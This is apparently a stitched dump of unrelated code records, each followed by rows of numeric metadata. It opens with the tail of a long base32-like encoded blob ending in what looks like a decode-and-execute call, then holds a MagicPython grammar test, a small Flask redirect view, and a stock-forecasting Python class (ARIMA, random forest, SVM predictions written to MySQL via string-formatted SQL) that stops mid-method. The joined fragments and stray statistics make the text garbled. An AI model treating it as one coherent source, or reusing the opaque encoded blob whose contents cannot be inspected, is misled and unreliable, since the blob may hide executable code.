ZVZJUAXOD6NJP7BABC6LFP2JGGBEYA5L4H6AO7XOGJGQA4ZXCX5KXDPSD2VYL4IH7IWOG7F7WRBZ33IQODRH7EYD4XYNV666XN77XM4LOYAC77MOPV6SBO7RH6FPTKDX4J6T7AP47CP7XXHEN77C6Y7BP3IDH7RNK4N76YMFGFILXGAZZK4ZBH733SIQEWQIQDS7YGKEQIAAG37GTSM4BKJ4FSAQACALWCBCH4KF43UE7RHXTVLDYXAR4MQCYCWSZIRPXPFWBQBAMVZWKB5F4YXQV46KUG6EQF6VE5U3BGK2KDDZU4GHTJEMPGSKLXTLAPTHGQ4CPDH563FYYARJCZYDQCOQSVQFAVHYVQT6FO6A35BU4LAFZALOXYNHQS7325C2QAG5UXR2GYFLXNSYETQZMGASWF5VNIUTTZHKEVGYFNMFX5SVBUJ5HZTDKYKEJUYP4YOVWJGRU7UYZY2TQTWZE2GJMH7BTYT3CMGN4BO4ATY43WTB3I5FAZQRJJXJYYGLI3NTJJUYGXYYHFSYRG5R2O7RFXJSZRFXOM4GLOSOG5CAC7DJLJQY6R3XN3GFH5FYDLB6YW74IENSOZAGD2UOKW3GO2MDZQIW5GEDPTFPOQIT3XTXRV727EI53D4U234JDKIRL5KFLKBRNTK5UU234KXDJQCCIT2NIQSEOQZRFXPXHIDCGUDSEER5MB4DDTVZB635IHCIFO7GOQGENJHEIJD2QDEFVHZKPBFH5VQ3QPBVCHIBYDWEMHADSEWTTEARFLB4CPPKU6RMCSWDWEP4NXADSEWTTEARFLB6CKR4NHANH7C47KXU2BBMI5BTCP6FTUBZCKZZSAYSVA7BAATU763LZYCB3RXHADCGVTSEFR5IBSC2TM6477LIYP5U6TIEGNHMMARM6RHEIM2NIHUK47UQAIYD4TWUWFQH4J6G45APIVY4ZATKVQ7BFI6FO6S2IA7W2O5IMBNDM4CQH4NWJXGIC2NIHEIS7VQFULCEOVJIBZCDZZA6RKLZSAWRKB7CEWRKEOVS2EECVHKCFVB2Q5MIOUHKCFVB2QT4AYJCWO54IUE7OOYAU555ICJ3PRWXDKAJKFKUAMEPKRPNHAGINST6ZNYIWTYC7UAFRGCZYAWR6R2AGUH5B6YDAA2SOYDJX34WE6OBNLL2J26TWNHHG4AOFMHIF6TL36OCUOUMCMGGOAQCEZK2CFMK6NSX2B6W3TERCYGH4DHHZBDHBDNZ6LKNWGPLSFHXQYVPMUIS23LDECU6TOMGQ66I2WO4GIUNYOD5ICT5ZS6WWIM35DBEXWPFQOQ5PCRZXB3N4DUUQDQV6H5XLMFG7WDQSAF5VSNPAT7CY3VCKOARLIVGQC5QHV6BTDZNEOGQGAS7VCNQGM56WOXCZGYBOJIVLJVFQ6YWYTDYI2Y7CA3MCAMSFZWKIZNRHQ4HFVPJBMKEZSCLMHRQA4XS3FC6FTRJCYVBQ2V6INCOPV4WW7GBLNFPYEEV6ALATXEHAE7XEBEVQTCW7JU5YP2RHEM2YB5GZKBICIW4AHTJMTIFCYLXMJZ6CH4L42FNU6K5KBGOE7UGMXIKKQNAHQT5WPH2RP7KT322AC2IP33APWMR32ITGKJ5BHEEYCCKCCMBAHAD4CAICOGEFAAMADQQI6Z6V4MI3E6HUEGPGXBLH7KQHH37UEMEZ5HHQ6P5TITXFSM5CKRT44EAWYLDJESQKITE2S6PXQLI3K63VMNMPYEDRWP2IANP2EM5MKWPZGOVEO35BHFC27SG5EA3FBGHB7SSN3LUWZ3HLIMV7UXZE6OYBMYDXQMQ5PQZHIJLUFMZBE6QW7EUX5HX47UO736ST7P6M747RL6RT2DVWQW5BJB7TCQMX5IG32GHKB6SUFL2TTS3UFCZBHV2CB5DZ2DHYKPUSSV7P73LE6TYA="))))
| 7,404.25
| 29,546
| 0.999122
| 18
| 29,617
| 1,643.944444
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.188726
| 0.00027
| 29,617
| 4
| 29,546
| 7,404.25
| 0.810666
| 0.001351
| 0
| 0
| 0
| 0
| 0.997025
| 0.997025
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
99d3a670f5f3af8a43c3220be3e7c1e9c9ab66cd
| 1,645
|
py
|
Python
|
test/statements/from1.py
|
abjugard/MagicPython
|
2802ded681e0ab1a1057821c1da287147d639505
|
[
"MIT"
] | 1,482
|
2015-10-16T21:59:32.000Z
|
2022-03-30T11:44:40.000Z
|
test/statements/from1.py
|
abjugard/MagicPython
|
2802ded681e0ab1a1057821c1da287147d639505
|
[
"MIT"
] | 226
|
2015-10-15T15:53:44.000Z
|
2022-03-25T03:08:27.000Z
|
test/statements/from1.py
|
abjugard/MagicPython
|
2802ded681e0ab1a1057821c1da287147d639505
|
[
"MIT"
] | 129
|
2015-10-20T02:41:49.000Z
|
2022-03-22T01:44:36.000Z
|
from ... import foo as bar
raise Exception('done') from exc
yield from foo
from : keyword.control.import.python, source.python
: source.python
... : punctuation.separator.period.python, source.python
: source.python
import : keyword.control.import.python, source.python
: source.python
foo : source.python
: source.python
as : keyword.control.import.python, source.python
: source.python
bar : source.python
raise : keyword.control.flow.python, source.python
: source.python
Exception : meta.function-call.python, source.python, support.type.exception.python
( : meta.function-call.python, punctuation.definition.arguments.begin.python, source.python
' : meta.function-call.arguments.python, meta.function-call.python, punctuation.definition.string.begin.python, source.python, string.quoted.single.python
done : meta.function-call.arguments.python, meta.function-call.python, source.python, string.quoted.single.python
' : meta.function-call.arguments.python, meta.function-call.python, punctuation.definition.string.end.python, source.python, string.quoted.single.python
) : meta.function-call.python, punctuation.definition.arguments.end.python, source.python
: source.python
from : keyword.control.flow.python, source.python
: source.python
exc : source.python
yield from : keyword.control.flow.python, source.python
: source.python
foo : source.python
| 48.382353
| 166
| 0.657143
| 181
| 1,645
| 5.972376
| 0.165746
| 0.288622
| 0.366327
| 0.199815
| 0.809436
| 0.753932
| 0.722479
| 0.683626
| 0.385754
| 0.246068
| 0
| 0
| 0.240122
| 1,645
| 33
| 167
| 49.848485
| 0.8648
| 0
| 0
| 0.37931
| 0
| 0.068966
| 0.002432
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.137931
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
99de51345671a61d45c66707155aa674b4c389f7
| 154
|
py
|
Python
|
app/main/views.py
|
lbgutierrez/kimble
|
35a5eb9a6899bd5840dbf88060cadbb60c52f946
|
[
"Apache-2.0"
] | null | null | null |
app/main/views.py
|
lbgutierrez/kimble
|
35a5eb9a6899bd5840dbf88060cadbb60c52f946
|
[
"Apache-2.0"
] | null | null | null |
app/main/views.py
|
lbgutierrez/kimble
|
35a5eb9a6899bd5840dbf88060cadbb60c52f946
|
[
"Apache-2.0"
] | null | null | null |
from . import main
from flask import redirect, url_for
@main.route("/", methods=["GET"])
def index():
return redirect( url_for( "auth.auth_login" ) )
| 25.666667
| 51
| 0.688312
| 22
| 154
| 4.681818
| 0.681818
| 0.213592
| 0.271845
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149351
| 154
| 6
| 51
| 25.666667
| 0.78626
| 0
| 0
| 0
| 0
| 0
| 0.122581
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
|
0
| 7
|
822126d2e95092e3b468e70baef8edee1af7624c
| 82,354
|
py
|
Python
|
FinsterTab/W2020/DataForecast.py
|
Nabeel-Asghar/GM-Senior-Project
|
b50f3cb6eb861fed3edf09168c0e43a317c7c965
|
[
"MIT"
] | 2
|
2020-02-01T23:41:58.000Z
|
2020-05-19T02:11:33.000Z
|
FinsterTab/W2020/DataForecast.py
|
mshields11/GM-Senior-Project
|
b50f3cb6eb861fed3edf09168c0e43a317c7c965
|
[
"MIT"
] | null | null | null |
FinsterTab/W2020/DataForecast.py
|
mshields11/GM-Senior-Project
|
b50f3cb6eb861fed3edf09168c0e43a317c7c965
|
[
"MIT"
] | null | null | null |
# import libraries to be used in this code module
import pandas as pd
from statsmodels.tsa.arima_model import ARIMA
from sklearn.ensemble import RandomForestRegressor
from sklearn.svm import SVR
from math import sqrt
from statistics import stdev
import numpy as np
import xgboost as xgb
import calendar
import datetime as dt
from datetime import timedelta, datetime
import FinsterTab.W2020.AccuracyTest
import sqlalchemy as sal
from sklearn.model_selection import train_test_split # not used at this time
from sklearn.linear_model import LinearRegression
from sklearn.preprocessing import PolynomialFeatures
import matplotlib.pyplot as plt
# class declaration and definition
class DataForecast:
def __init__(self, engine, table_name):
"""
Calculate historic one day returns and 10 days of future price forecast
based on various methods
Store results in dbo_AlgorithmForecast table
:param engine: provides connection to MySQL Server
:param table_name: table name where ticker symbols are stored
"""
self.engine = engine
self.table_name = table_name
def calculate_forecast(self):
"""
Calculate historic one day returns based on traditional forecast model
and 10 days of future price forecast
Store results in dbo_AlgorithmForecast
Improved forecast where we took out today's close price to predict today's price
10 prior business days close prices are used as inputs to predict next day's price
"""
# retrieve InstrumentMaster table from the database
query = 'SELECT * FROM {}'.format(self.table_name)
df = pd.read_sql_query(query, self.engine)
algoCode = "'PricePred'" # Master `algocode` for improved prediction from previous group, user created codes
# add code to database if it doesn't exist
code_query = 'SELECT COUNT(*) FROM dbo_algorithmmaster WHERE algorithmcode=%s' % algoCode
count = pd.read_sql_query(code_query, self.engine)
if count.iat[0, 0] == 0:
algoName = "'PricePrediction'"
insert_code_query = 'INSERT INTO dbo_algorithmmaster VALUES({},{})'.format(algoCode, algoName)
self.engine.execute(insert_code_query)
# loop through each ticker symbol
for ID in df['instrumentid']:
# remove all future prediction dates
remove_future_query = 'DELETE FROM dbo_algorithmforecast WHERE algorithmcode={} AND prederror=0 AND ' \
'instrumentid={}'.format(algoCode, ID)
self.engine.execute(remove_future_query)
# find the latest forecast date
date_query = 'SELECT forecastdate FROM dbo_algorithmforecast WHERE algorithmcode={} AND instrumentid={} ' \
'ORDER BY forecastdate DESC LIMIT 1'.format(algoCode, ID)
latest_date = pd.read_sql_query(date_query, self.engine) # most recent forecast date calculation
# if table has forecast prices already find the latest one and delete it
# need to use most recent data for today if before market close at 4pm
if not latest_date.empty:
latest_date_str = "'" + str(latest_date['forecastdate'][0]) + "'"
delete_query = 'DELETE FROM dbo_algorithmforecast WHERE algorithmcode={} AND instrumentid={} AND ' \
'forecastdate={}'.format(algoCode, ID, latest_date_str)
self.engine.execute(delete_query)
# get raw price data from database
data_query = 'SELECT A.date, A.close, B.ltrough, B.lpeak, B.lema, B.lcma, B.highfrllinelong, ' \
'B. medfrllinelong, B.lowfrllinelong FROM dbo_instrumentstatistics AS A, '\
'dbo_engineeredfeatures AS B WHERE A.instrumentid=B.instrumentid AND A.date=B.date ' \
'AND A.instrumentid=%s ORDER BY Date ASC' %ID
data = pd.read_sql_query(data_query, self.engine)
# prediction formula inputs
# IF THESE VALUES ARE CHANGED, ALL RELATED PREDICTIONS STORED IN THE DATABASE BECOME INVALID!
sMomentum = 2
lMomentum = 5
sDev = 10
ma = 10
start = max(sMomentum, lMomentum, sDev, ma)
# calculate prediction inputs
data['sMomentum'] = data['close'].diff(sMomentum)
data['lMomentum'] = data['close'].diff(lMomentum)
data['stDev'] = data['close'].rolling(sDev).std()
data['movAvg'] = data['close'].rolling(ma).mean()
# first predictions can be made after 'start' number of days
for n in range(start, len(data)):
insert_query = 'INSERT INTO dbo_algorithmforecast VALUES ({}, {}, {}, {}, {})'
# populate entire table if empty
# or add new dates based on information in Statistics table
"""Look into this to add SMA"""
if latest_date.empty or latest_date['forecastdate'][0] <= data['date'][n]:
if data['sMomentum'][n-1] >= 0 and data['lMomentum'][n-1] >= 0:
forecastClose = data['close'][n-1] + (2.576 * data['stDev'][n-1] / sqrt(sDev))
elif data['sMomentum'][n-1] <= 0 and data['lMomentum'][n-1] <= 0:
forecastClose = data['close'][n - 1] + (2.576 * data['stDev'][n - 1] / sqrt(sDev))
else:
forecastClose = data['movAvg'][n-1]
predError = 100 * abs(forecastClose - data['close'][n])/data['close'][n]
forecastDate = "'" + str(data['date'][n]) + "'"
#insert new prediction into table
insert_query = insert_query.format(forecastDate, ID, forecastClose, algoCode, predError)
self.engine.execute(insert_query)
# model for future price movements
data['momentumA'] = data['close'].diff(10)
data['lagMomentum'] = data['momentumA'].shift(5)
fdate = "'" + str(data['date'][n]) + "'"
# number of weekdays
weekdays = 10
# 3 weeks of weekdays
days = 15
forecast = []
forecast_dates_query = 'SELECT date from dbo_datedim WHERE date > {} AND weekend=0 AND isholiday=0 ' \
'ORDER BY date ASC LIMIT {}'.format(fdate, weekdays)
future_dates = pd.read_sql_query(forecast_dates_query, self.engine)
insert_query = 'INSERT INTO dbo_algorithmforecast VALUES ({}, {}, {}, {}, {})'
# Forecast close price tomorrow
if data['sMomentum'][n] >= 0 and data['lMomentum'][n] >= 0:
forecastClose = data['close'][n] + (2.576 * data['stDev'][n] / sqrt(sDev))
elif data['sMomentum'][n] <= 0 and data['lMomentum'][n] <= 0:
forecastClose = data['close'][n] + (2.576 * data['stDev'][n] / sqrt(sDev))
else:
forecastClose = data['movAvg'][n]
predError = 0
forecastDate = "'" + str(future_dates['date'][0]) + "'"
insert_query = insert_query.format(forecastDate, ID, forecastClose, algoCode, predError)
self.engine.execute(insert_query)
# forecast next 9 days
# for i in range # of weekdays
"""Forecast for future from here down"""
for i in range(1, len(future_dates)):
insert_query = 'INSERT INTO dbo_algorithmforecast VALUES ({}, {}, {}, {}, {})'
# if the momentum is negative
if data['momentumA'].tail(1).iloc[0] < 0.00:
# Set Fibonacci extensions accordingly
data['fibExtHighNeg'] = data['lpeak'] - (
(data['lpeak'] - data['ltrough']) * 1.236)
data['fibExtLowNeg'] = data['lpeak'] - (
(data['lpeak'] - data['ltrough']) * 1.382)
highfrllinelong = data['highfrllinelong'].tail(1).iloc[0]
# Compute average over last 3 weeks of weekdays
avg_days = np.average(data['close'].tail(days))
# Compute standard Deviation over the last 3 weeks and the average.
std_days = stdev(data['close'].tail(days), avg_days)
# Compute Standard Error and apply to variable decrease
# assign CMA and EMA values
decrease = avg_days - (1.960 * std_days) / (sqrt(days))
data['fibExtHighPos'] = 0
data['fibExtLowPos'] = 0
l_cma = data['lcma'].tail(1)
l_cma = l_cma.values[0]
l_ema = data['lema'].tail(1)
l_ema = l_ema.values[0]
# Loop through each upcoming day in the week
for x in range(weekdays-1):
# Compare to current location of cma and frl values
# if CMA and FRL are lower than forecast
# Forecast lower with a medium magnitude
if decrease > l_cma or decrease >= (highfrllinelong + (highfrllinelong * 0.01)) \
or decrease > l_ema:
decrease -= .5 * std_days
forecast.append(decrease)
# If CMA and FRL are higher than forecast
# Forecast to rise with an aggressive magnitude
elif decrease <= l_cma and decrease <= (
highfrllinelong - (highfrllinelong * 0.01)) and decrease <= l_ema:
decrease += 1.5 * std_days
forecast.append(decrease)
x = x + 1
# if the momentum is positive
elif data['momentumA'].tail(1).iloc[0] > 0.00:
# ...Set fibonacci extensions accordingly
data['fibExtHighPos'] = data['lpeak'] + (
(data['lpeak'] - data['ltrough']) * 1.236)
data['fibExtLowPos'] = data['lpeak'] + (
(data['lpeak'] - data['ltrough']) * 1.382)
highfrllinelong = data['highfrllinelong'].tail(1).iloc[0]
# Compute average over last 3 weeks of weekdays
avg_days = np.average(data['close'].tail(days))
# Compute standard Deviation over the last 3 weeks and the average.
std_days = stdev(data['close'].tail(days), avg_days)
# Compute Standard Error and apply to variable increase
increase = avg_days + (1.960 * std_days) / (sqrt(days))
data['fibExtHighNeg'] = 0
data['fibExtLowNeg'] = 0
l_cma = data['lcma'].tail(1)
l_cma = l_cma.values[0]
l_ema = data['lema'].tail(1)
l_ema = l_ema.values[0]
for x in range(weekdays-1):
# Compare to current location of cma and frl values
# if CMA and FRL are lower than forecast
# Forecast lower with a normal magnitude
if increase > l_cma and increase >= (highfrllinelong - (highfrllinelong * 0.01)) \
and increase > l_ema:
increase -= std_days
forecast.append(increase)
# if CMA and FRL are lower than forecast
# Forecast lower with an aggressive magnitude
elif increase <= l_cma or increase <= (
highfrllinelong - (highfrllinelong * 0.01)) or increase <= l_ema:
increase += 1.5 * std_days
forecast.append(increase)
forecastDateStr = "'" + str(future_dates['date'][i]) + "'"
# Send the addition of new variables to SQL
# predicted values error is 0 because the actual close prices for the future is not available
predError = 0
insert_query = insert_query.format(forecastDateStr, ID, forecast[i], algoCode, predError)
self.engine.execute(insert_query)
"""Look into why warnings due to incorrect inputs"""
def calculate_arima_forecast(self):
"""
Calculate historic next-day returns based on ARIMA forecast model
and 10 days of future price forecast
Store results in dbo_AlgorithmForecast
To predict next day's value, prior 50 business day's close prices are used
"""
# retrieve InstrumentsMaster table from database
query = 'SELECT * FROM {}'.format(self.table_name)
df = pd.read_sql_query(query, self.engine)
algoCode = "'ARIMA'"
# add code to database if it doesn't exist
code_query = 'SELECT COUNT(*) FROM dbo_algorithmmaster WHERE algorithmcode=%s' % algoCode
count = pd.read_sql_query(code_query, self.engine)
if count.iat[0, 0] == 0:
algoName = "'ARIMA'"
insert_code_query = 'INSERT INTO dbo_algorithmmaster VALUES({},{})'.format(algoCode, algoName)
self.engine.execute(insert_code_query)
# loop through each ticker symbol
for ID in df['instrumentid']:
# remove all future prediction dates
remove_future_query = 'DELETE FROM dbo_algorithmforecast WHERE algorithmcode={} AND prederror=0 AND ' \
'instrumentid={}'.format(algoCode, ID)
self.engine.execute(remove_future_query)
# find the latest forecast date
date_query = 'SELECT forecastdate FROM dbo_algorithmforecast WHERE algorithmcode={} AND instrumentid={} ' \
'ORDER BY forecastdate DESC LIMIT 1'.format(algoCode, ID)
latest_date = pd.read_sql_query(date_query, self.engine) # most recent forecast date calculation
# if table has forecast prices already find the latest one and delete it
# need to use most recent data for today if before market close at 4pm
if not latest_date.empty:
latest_date_str = "'" + str(latest_date['forecastdate'][0]) + "'"
delete_query = 'DELETE FROM dbo_algorithmforecast WHERE algorithmcode={} AND instrumentid={} AND ' \
'forecastdate={}'.format(algoCode, ID, latest_date_str)
self.engine.execute(delete_query)
# get raw price data from database
data_query = 'SELECT date, close FROM dbo_instrumentstatistics WHERE instrumentid=%s ORDER BY Date ASC' % ID
data = pd.read_sql_query(data_query, self.engine)
"""Below here to look at for ARIMA warnings and to tweak"""
# training data size
# IF THIS CHANGES ALL PREDICTIONS STORED IN DATABASE BECOME INVALID!
input_length = 10
for n in range((input_length-1), len(data)):
insert_query = 'INSERT INTO dbo_algorithmforecast VALUES ({}, {}, {}, {}, {})'
# populate entire table if empty
# or add new dates based on information in Statistics table
if latest_date.empty or latest_date['forecastdate'][0] <= data['date'][n]:
training_data = data['close'][n-(input_length-1):n]
arima = ARIMA(training_data, order=(0,1,0)) # most suited order combination after many trials
fitted_arima = arima.fit(disp=-1)
forecastClose = data['close'][n] + fitted_arima.fittedvalues[n-1]
predError = 100 * abs(forecastClose - data['close'][n]) / data['close'][n]
forecastDate = "'" + str(data['date'][n]) + "'"
insert_query = insert_query.format(forecastDate, ID, forecastClose, algoCode, predError)
self.engine.execute(insert_query)
# training and test data set sizes
forecast_length = 10
forecast_input = 50
# find ARIMA model for future price movements
training_data = data['close'][-forecast_input:]
model = ARIMA(training_data, order=(0, 1, 0))
fitted = model.fit(disp=0)
fc, se, conf = fitted.forecast(forecast_length, alpha=0.5)
forecast_dates_query = 'SELECT date from dbo_datedim WHERE date > {} AND weekend=0 AND isholiday=0 ' \
'ORDER BY date ASC LIMIT {}'.format(forecastDate, forecast_length)
future_dates = pd.read_sql_query(forecast_dates_query, self.engine)
# insert prediction into database
date = data['date'][n]
for n in range(0, forecast_length):
insert_query = 'INSERT INTO dbo_algorithmforecast VALUES ({}, {}, {}, {}, {})'
forecastClose = fc[n]
predError = 0
forecastDate = "'" + str(future_dates['date'][n]) + "'"
insert_query = insert_query.format(forecastDate, ID, forecastClose, algoCode, predError)
self.engine.execute(insert_query)
def calculate_random_forest_forecast(self):
"""
Calculate historic next-day returns based on Random Forest forecast model
and 10 days of future price forecast
Store results in dbo_AlgorithmForecast table in the database
"""
# retrieve InstrumentsMaster table from database
query = 'SELECT * FROM {}'.format(self.table_name)
df = pd.read_sql_query(query, self.engine)
algoCode = "'RandomForest'"
# add code to database if it doesn't exist
code_query = 'SELECT COUNT(*) FROM dbo_algorithmmaster WHERE algorithmcode=%s' % algoCode
count = pd.read_sql_query(code_query, self.engine)
if count.iat[0, 0] == 0:
algoName = "'RandomForest'"
insert_code_query = 'INSERT INTO dbo_algorithmmaster VALUES({},{})'.format(algoCode, algoName)
self.engine.execute(insert_code_query)
# loop through each ticker symbol
for ID in df['instrumentid']:
# remove all future prediction dates - these need to be recalculated daily
remove_future_query = 'DELETE FROM dbo_algorithmforecast WHERE algorithmcode={} AND prederror=0 AND ' \
'instrumentid={}'.format(algoCode, ID)
self.engine.execute(remove_future_query)
# find the latest forecast date
date_query = 'SELECT forecastdate FROM dbo_algorithmforecast WHERE algorithmcode={} AND instrumentid={} ' \
'ORDER BY forecastdate DESC LIMIT 1'.format(algoCode, ID)
latest_date = pd.read_sql_query(date_query, self.engine) # most recent forecast date calculation
# if table has forecast prices already find the latest one and delete it
# need to use most recent data for today if before market close at 4pm
if not latest_date.empty:
latest_date_str = "'" + str(latest_date['forecastdate'][0]) + "'"
delete_query = 'DELETE FROM dbo_algorithmforecast WHERE algorithmcode={} AND instrumentid={} AND ' \
'forecastdate={}'.format(algoCode, ID, latest_date_str)
self.engine.execute(delete_query)
# get raw price data from database
data_query = 'SELECT date, close FROM dbo_instrumentstatistics WHERE instrumentid=%s ORDER BY Date ASC' % ID
data = pd.read_sql_query(data_query, self.engine)
# training data size
# IF THIS CHANGES ALL PREDICTIONS STORED IN DATABASE BECOME INVALID!
input_length = 10
for n in range((input_length - 1), len(data)):
insert_query = 'INSERT INTO dbo_algorithmforecast VALUES ({}, {}, {}, {}, {})'
# populate entire table if empty
# or add new dates based on information in Statistics table
if latest_date.empty or latest_date['forecastdate'][0] <= data['date'][n]:
# historical next-day random forest forecast
x_train = [i for i in range(input_length-1)]
y_train = data['close'][n - (input_length - 1):n]
x_test = [input_length-1]
x_train = np.array(x_train)
y_train = np.array(y_train)
x_test = np.array(x_test)
x_train = x_train.reshape(-1, 1)
x_test = x_test.reshape(-1, 1)
clf_rf = RandomForestRegressor(n_estimators=100) # meta estimator with classifying decision trees
clf_rf.fit(x_train, y_train) # x and y train fit into classifier
forecastClose = clf_rf.predict(x_test)[0]
predError = 100 * abs(forecastClose-data['close'][n])/data['close'][n] # standard MBE formula
forecastDate = "'" + str(data['date'][n]) + "'"
insert_query = insert_query.format(forecastDate, ID, forecastClose, algoCode, predError)
self.engine.execute(insert_query)
# training and test data set sizes
forecast_length = 10
forecast_input = 50
# find Random Forest model for future price movements
x_train = [i for i in range(forecast_input)]
y_train = data['close'][-forecast_input:]
x_test = [i for i in range(forecast_length)]
x_train = np.array(x_train)
y_train = np.array(y_train)
x_test = np.array(x_test)
x_train = x_train.reshape(-1, 1)
x_test = x_test.reshape(-1, 1)
clf_rf = RandomForestRegressor(n_estimators=100)
clf_rf.fit(x_train, y_train)
forecast = clf_rf.predict(x_test)
forecast_dates_query = 'SELECT date from dbo_datedim WHERE date > {} AND weekend=0 AND isholiday=0 ' \
'ORDER BY date ASC LIMIT {}'.format(forecastDate, forecast_length)
future_dates = pd.read_sql_query(forecast_dates_query, self.engine)
# insert prediction into database
date = data['date'][n]
for n in range(0, forecast_length):
insert_query = 'INSERT INTO dbo_algorithmforecast VALUES ({}, {}, {}, {}, {})'
forecastClose = forecast[n]
predError = 0
forecastDate = "'" + str(future_dates['date'][n]) + "'"
insert_query = insert_query.format(forecastDate, ID, forecastClose, algoCode, predError)
self.engine.execute(insert_query)
"""Delete Forecast old"""
def calculate_forecast_old(self):
"""
Calculate historic one day returns based on traditional forecast model
and 10 days of future price forecast
Store results in dbo_AlgorithmForecast
This method was from Winter 2019 or before and is not really useful because
it uses each day's actual close price (after the market closes) to predict that day's close price -
it is only included for comparison with our improved `PricePred` algorithm`
Prior 10 days close prices are used to predict the price for the next day
"""
# retrieve InstrumentsMaster table from database
query = 'SELECT * FROM {}'.format(self.table_name)
df = pd.read_sql_query(query, self.engine)
algoCode = "'PricePredOld'"
# add code to database if it doesn't exist
code_query = 'SELECT COUNT(*) FROM dbo_algorithmmaster WHERE algorithmcode=%s' % algoCode
count = pd.read_sql_query(code_query, self.engine)
if count.iat[0, 0] == 0:
algoName = "'PricePredictionOld'"
insert_code_query = 'INSERT INTO dbo_algorithmmaster VALUES({},{})'.format(algoCode, algoName)
self.engine.execute(insert_code_query)
# loop through each ticker symbol
for ID in df['instrumentid']:
# remove all future prediction dates
remove_future_query = 'DELETE FROM dbo_algorithmforecast WHERE algorithmcode={} AND prederror=0 AND ' \
'instrumentid={}'.format(algoCode, ID)
self.engine.execute(remove_future_query)
# find the latest forecast date
date_query = 'SELECT forecastdate FROM dbo_algorithmforecast WHERE algorithmcode={} AND instrumentid={} ' \
'ORDER BY forecastdate DESC LIMIT 1'.format(algoCode, ID)
latest_date = pd.read_sql_query(date_query, self.engine) # most recent forecast date calculation
# if table has forecast prices already find the latest one and delete it
# need to use most recent data for today when market closes at 4pm, not before that
if not latest_date.empty:
latest_date_str = "'" + str(latest_date['forecastdate'][0]) + "'"
delete_query = 'DELETE FROM dbo_algorithmforecast WHERE algorithmcode={} AND instrumentid={} AND ' \
'forecastdate={}'.format(algoCode, ID, latest_date_str)
self.engine.execute(delete_query)
# get raw price data from database
data_query = 'SELECT date, close FROM dbo_instrumentstatistics WHERE instrumentid=%s ORDER BY Date ASC' % ID
data = pd.read_sql_query(data_query, self.engine)
# prediction formula inputs
# IF THESE CHANGE ALL RELATED PREDICTIONS STORED IN DATABASE BECOME INVALID!
momentum = 5
sDev = 10
ma = 10
start = max(momentum, sDev, ma)
# calculate prediction inputs
data['momentum'] = data['close'].diff(momentum)
data['stDev'] = data['close'].rolling(sDev).std()
data['movAvg'] = data['close'].rolling(ma).mean()
# first predictions can me made after 'start' number of days, its 10 days
for n in range(start, len(data)):
insert_query = 'INSERT INTO dbo_algorithmforecast VALUES ({}, {}, {}, {}, {})'
# populate entire table if empty
# or add new dates based on information in Statistics table
if latest_date.empty or latest_date['forecastdate'][0] <= data['date'][n]:
if data['momentum'][n] >= 0:
forecastClose = data['close'][n] + (2.576 * data['stDev'][n] / sqrt(sDev))
else:
forecastClose = data['close'][n] - (2.576 * data['stDev'][n] / sqrt(sDev))
predError = 100 * abs(forecastClose - data['close'][n]) / data['close'][n]
forecastDate = "'" + str(data['date'][n]) + "'"
# insert new prediction into table
insert_query = insert_query.format(forecastDate, ID, forecastClose, algoCode, predError)
self.engine.execute(insert_query)
"""Use these forecast to generate buy sell signals"""
def calculate_svm_forecast(self):
"""
Calculate historic next-day returns based on SVM
and 10 days of future price forecast
Store results in dbo_AlgorithmForecast
Each prediction is made using prior 10 business days' close prices
"""
# retrieve InstrumentsMaster table from database
query = 'SELECT * FROM {}'.format(self.table_name)
df = pd.read_sql_query(query, self.engine)
algoCode = "'svm'"
# add code to database if it doesn't exist
code_query = 'SELECT COUNT(*) FROM dbo_algorithmmaster WHERE algorithmcode=%s' % algoCode
count = pd.read_sql_query(code_query, self.engine)
if count.iat[0, 0] == 0:
algoName = "'SVM'"
insert_code_query = 'INSERT INTO dbo_algorithmmaster VALUES({},{})'.format(algoCode, algoName)
self.engine.execute(insert_code_query)
# loop through each ticker symbol
for ID in df['instrumentid']:
# remove all future prediction dates - these need to be recalculated daily
remove_future_query = 'DELETE FROM dbo_AlgorithmForecast WHERE AlgorithmCode={} AND PredError=0 AND ' \
'InstrumentID={}'.format(algoCode, ID)
self.engine.execute(remove_future_query)
# find the latest forecast date
date_query = 'SELECT ForecastDate FROM dbo_AlgorithmForecast WHERE AlgorithmCode={} AND InstrumentID={} ' \
'ORDER BY ForecastDate DESC LIMIT 1'.format(algoCode, ID)
latest_date = pd.read_sql_query(date_query, self.engine) # most recent forecast date calculation
# if table has forecast prices already find the latest one and delete it
# need to use most recent data for today if before market close at 4pm
if not latest_date.empty:
latest_date_str = "'" + str(latest_date['ForecastDate'][0]) + "'"
delete_query = 'DELETE FROM dbo_AlgorithmForecast WHERE AlgorithmCode={} AND InstrumentID={} AND ' \
'ForecastDate={}'.format(algoCode, ID, latest_date_str)
self.engine.execute(delete_query)
# get raw price data from database
data_query = 'SELECT Date, Close FROM dbo_InstrumentStatistics WHERE InstrumentID=%s ORDER BY Date ASC' % ID
data = pd.read_sql_query(data_query, self.engine)
# training data size
# IF THIS CHANGES ALL PREDICTIONS STORED IN DATABASE BECOME INVALID!
input_length = 10
for n in range((input_length - 1), len(data)):
insert_query = 'INSERT INTO dbo_AlgorithmForecast VALUES ({}, {}, {}, {}, {})'
# populate entire table if empty
